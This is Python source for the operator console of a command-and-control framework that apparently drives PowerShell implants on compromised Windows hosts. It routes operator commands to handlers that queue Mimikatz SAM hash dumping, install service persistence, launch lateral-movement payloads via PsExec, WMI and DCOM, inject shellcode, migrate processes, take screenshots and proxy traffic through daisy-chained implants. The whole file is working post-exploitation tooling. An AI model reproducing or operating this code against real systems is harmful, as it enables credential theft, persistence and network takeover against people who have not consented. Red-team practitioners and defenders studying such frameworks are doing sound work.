def do_hashdump(user, command, randomuri):
    """Queue the Mimikatz ``lsadump::sam`` task on the implant behind *randomuri*.

    ``command`` is accepted only so the handler signature matches the other
    ``do_*`` functions; it is not used here.
    """
    required_module = "Invoke-Mimikatz.ps1"
    check_module_loaded(required_module, randomuri, user)
    task = "Invoke-Mimikatz -Command '\"lsadump::sam\"'"
    new_task(task, user, randomuri)
def do_invoke_daisychain(user, command, randomuri):
    """Load Invoke-DaisyChain.ps1 and task it with the URL list from get_allurls().

    After queuing the task the implant is labelled ``DaisyHost`` and the
    operator is reminded of the follow-up step.
    """
    check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
    url_list = get_allurls()
    task = "%s -URLs '%s'" % (command, url_list)
    new_task(task, user, randomuri)
    update_label("DaisyHost", randomuri)
    print("Now use createdaisypayload")
def do_loadmodule(user, command, randomuri):
    """Strip the ``loadmodule `` verb (case-insensitive) and load what remains.

    Every occurrence of the verb is removed, matching the original regex
    substitution; the remainder is passed to ``check_module_loaded``.
    """
    module_name = re.sub("loadmodule ", "", command, flags=re.IGNORECASE)
    check_module_loaded(module_name, randomuri, user)
def do_invoke_runas(user, command, randomuri):
    """Load Invoke-RunAs.ps1 and queue the command with a normalised verb.

    The ``invoke-runas `` verb is removed case-insensitively (all occurrences)
    and re-added in lower case so the implant always sees the same spelling.
    """
    check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
    arguments = re.sub("invoke-runas ", "", command, flags=re.IGNORECASE)
    new_task("invoke-runas %s" % arguments, user, randomuri)
def do_invoke_wmiexec(user, command, randomuri):
    """Load Invoke-WMIExec.ps1 and queue the command with a normalised verb.

    The ``invoke-wmiexec `` verb is removed case-insensitively (all occurrences)
    and re-added in lower case so the implant always sees the same spelling.
    """
    check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
    arguments = re.sub("invoke-wmiexec ", "", command, flags=re.IGNORECASE)
    new_task("invoke-wmiexec %s" % arguments, user, randomuri)
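def _expand_ps_aliases(command):
    """Rewrite any ``ps_alias`` prefix found at the start of *command*.

    Bug fix: the original called ``command.replace(...)`` and discarded the
    result (strings are immutable), so aliases were silently never applied.
    Only the first occurrence is replaced; because of the ``startswith`` guard
    that is always the verb at the front, so arguments are left untouched.
    """
    for alias in ps_alias:
        if command.startswith(alias[0]):
            command = command.replace(alias[0], alias[1], 1)
    return command


def _confirm_opsec(command):
    """Prompt before a command whose prefix is listed in ``ps_opsec``.

    Returns the command unchanged if the operator confirms, or ``""`` if they
    answer ``n`` (any case) or just press Enter. Only the first matching
    prefix prompts. NOTE(review): any other answer ("no", "x", ...) is
    treated as confirmation — unchanged from the original behaviour.
    """
    for opsec in ps_opsec:
        if opsec == command[:len(opsec)]:
            print_bad("**OPSEC Warning**")
            ri = input("Do you want to continue running - %s? (y/N) " % command)
            if ri == "" or ri.lower() == "n":
                command = ""
            break
    return command


def handle_ps_command(command, user, randomuri, implant_id):
    """Route one operator command line for a PowerShell implant to its handler.

    Args:
        command: raw command line typed by the operator.
        user: operator name, passed through to every ``do_*`` handler.
        randomuri: identifier of the implant the command is for.
        implant_id: unused here; kept for signature compatibility with callers.

    Flow: ensure Stage2-Core.ps1 is loaded (a failure is reported, not fatal),
    expand aliases, strip whitespace, run autoloads, ask for opsec
    confirmation where configured, then dispatch. The branch order is kept
    from the original chain because some keys are prefixes of others
    (``invoke-runaspayload`` before ``invoke-runas ``, ``sharpsocks`` before
    ``sharp``). Anything unmatched and non-empty goes to ``do_shell``.
    """
    try:
        check_module_loaded("Stage2-Core.ps1", randomuri, user)
    except Exception as e:
        # best-effort: report and carry on, as the original did
        print_bad("Error loading Stage2-Core.ps1: %s" % e)

    command = _expand_ps_aliases(command).strip()
    run_autoloads(command, randomuri, user)
    command = _confirm_opsec(command)

    if command.startswith("searchhistory"):
        do_searchhistory(user, command, randomuri)
    elif command.startswith("searchhelp"):
        do_searchhelp(user, command, randomuri)
    elif command.startswith("download-files "):
        do_download_files(user, command, randomuri)
    elif command.startswith("install-servicelevel-persistence"):
        do_install_servicelevel_persistence(user, command, randomuri)
    elif command.startswith("remove-servicelevel-persistence"):
        do_remove_servicelevel_persistence(user, command, randomuri)
    elif command.startswith("get-implantworkingdirectory"):
        do_get_implantworkingdirectory(user, command, randomuri)
    elif command.startswith("get-system"):
        do_get_system(user, command, randomuri)
    elif command.startswith(("invoke-psexec ", "invoke-smbexec ")):
        do_invoke_psexec(user, command, randomuri)
    elif command.startswith("invoke-psexecpayload "):
        do_invoke_psexecpayload(user, command, randomuri)
    elif command.startswith("invoke-wmiexec "):
        do_invoke_wmiexec(user, command, randomuri)
    elif command.startswith("invoke-wmijspbindpayload "):
        do_invoke_wmijspbindpayload(user, command, randomuri)
    elif command.startswith("invoke-wmijspayload "):
        do_invoke_wmijspayload(user, command, randomuri)
    elif command.startswith("invoke-wmipayload "):
        do_invoke_wmipayload(user, command, randomuri)
    elif command.startswith("invoke-dcompayload "):
        do_invoke_dcompayload(user, command, randomuri)
    elif command.startswith("invoke-runaspayload"):
        do_invoke_runaspayload(user, command, randomuri)
    elif command.startswith("invoke-runas "):
        do_invoke_runas(user, command, randomuri)
    elif command == "help":
        do_help(user, command, randomuri)
    elif command.startswith("get-pid"):
        do_get_pid(user, command, randomuri)
    elif command.startswith("upload-file"):
        do_upload_file(user, command, randomuri)
    elif command in ("kill-implant", "exit"):
        do_kill_implant(user, command, randomuri)
    elif command.startswith("migrate"):
        do_migrate(user, command, randomuri)
    elif command.startswith("loadmoduleforce"):
        # handler name spelling kept as defined elsewhere in this module
        do_loadmoudleforce(user, command, randomuri)
    elif command.startswith("loadmodule"):
        do_loadmodule(user, command, randomuri)
    elif command.startswith("pbind-loadmodule"):
        do_pbind_loadmodule(user, command, randomuri)
    elif command.startswith("invoke-daisychain"):
        do_invoke_daisychain(user, command, randomuri)
    elif command.startswith("inject-shellcode"):
        do_inject_shellcode(user, command, randomuri)
    elif command == "listmodules":
        do_listmodules(user, command, randomuri)
    elif command == "modulesloaded":
        do_modulesloaded(user, command, randomuri)
    elif command == "ps":
        do_ps(user, command, randomuri)
    elif command == "get-screenshotmulti":
        do_get_screenshotmulti(user, command, randomuri)
    elif command == "get-powerstatus":
        do_get_powerstatus(user, command, randomuri)
    elif command == "get-screenshot":
        do_get_screenshot(user, command, randomuri)
    elif command == "hashdump":
        do_hashdump(user, command, randomuri)
    elif command == "loadpowerstatus":
        do_loadpowerstatus(user, command, randomuri)
    elif command == "stopdaisy":
        do_stopdaisy(user, command, randomuri)
    elif command == "stopsocks":
        do_stopsocks(user, command, randomuri)
    elif command == "sharpsocks":
        do_sharpsocks(user, command, randomuri)
    elif command.startswith("enable-rotation"):
        do_rotation(user, command, randomuri)
    elif command.startswith("get-rotation"):
        do_get_rotation(user, command, randomuri)
    elif command.startswith("reversedns"):
        do_reversedns(user, command, randomuri)
    elif command.startswith("startdaisy"):
        do_startdaisy(user, command, randomuri)
    elif command.startswith(("sharp", "run-exe", "run-dll")):
        do_sharp(user, command, randomuri)
    elif command:
        # empty command (e.g. opsec prompt declined) sends nothing
        do_shell(user, command, randomuri)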